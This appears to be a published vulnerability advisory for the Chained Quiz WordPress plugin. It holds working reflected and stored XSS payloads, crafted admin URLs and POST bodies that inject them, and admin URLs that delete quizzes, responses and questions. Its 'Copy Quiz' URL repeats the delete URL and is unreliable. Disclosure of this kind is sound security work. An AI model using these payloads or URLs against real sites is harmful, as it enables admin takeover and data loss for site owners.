Author: Muhammad Zeeshan (Xib3rR4dAr)
Date: November 24, 2022
Description:
Multiple endpoints are vulnerable to XSS. When a logged in admin will visit a URL shared by an attacker, XSS will trigger which can be exploited to add a new admin user on website.
sanitize_text_field is used while esc_attr should've been used.
Vulnerable Files:
chained-quiz/controllers/completed.php
chained-quiz/views/completed.html.php
and more
Payload:
" onmouseover=alert(1) style=position:absolute;width:100%;height:100%;top:0;left:0; aURL Encoded Payload:
%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20aPoC:
While logged in as admin, visiting following crafted requests will trigger XSS:
/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&points=&pointsf=&result_id=0&source_url=
/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&result_id=0&source_url=
/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&dnf=&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&email=&emailf=&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ip=&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&ipf=&date=&datef=&points=&pointsf=&result_id=0&source_url=
/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&date=&datef=&points=&pointsf=&result_id=0&source_url=
/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&ob=datetime&dir=desc&dn=&dnf=&email=&emailf=&ip=&ipf=&date=%22%20onmouseover%3Dalert(1)%20style%3Dposition%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%20a&datef=&points=&pointsf=&result_id=0&source_url=
Similarly, other endpoints in the plugin are also vulnerable to Admin Stored XSS even if DISALLOW_UNFILTERED_HTML is set to true, some are:
- Visit [Social Sharing page](http://example.com/wp-admin/admin.php?page=chainedquiz_social_sharing as admin) and set Facebook App ID input to:
" onclick=alert(1) a - Visit Integrations page as admin and set MailChimp API Key to :
" onclick=alert(1) a
XSS will trigger when input box will be clicked, or when page is hovered depending on XSS payload that is used.
POST /wp-admin/admin.php?page=chainedquiz_social_sharing
...
facebook_appid=" onclick=alert(1) a
POST /wp-admin/admin.php?page=chainedquiz_integrations&tab=mailchimp
...
api_key=someapikey" onclick=alert(1) a
Delete a quiz:
/wp-admin/admin.php?page=chained_quizzes&del=1&id=2
Delete submitted responses:
/wp-admin/admin.php?page=chainedquiz_list&quiz_id=1&offset=0&ob=tC.id&dir=desc&del=5
Delete a question from a quiz:
/wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1
Copy Quiz:
/wp-admin/admin.php?page=chainedquiz_questions&quiz_id=1&del=1&id=1
@Xib3rR4dAr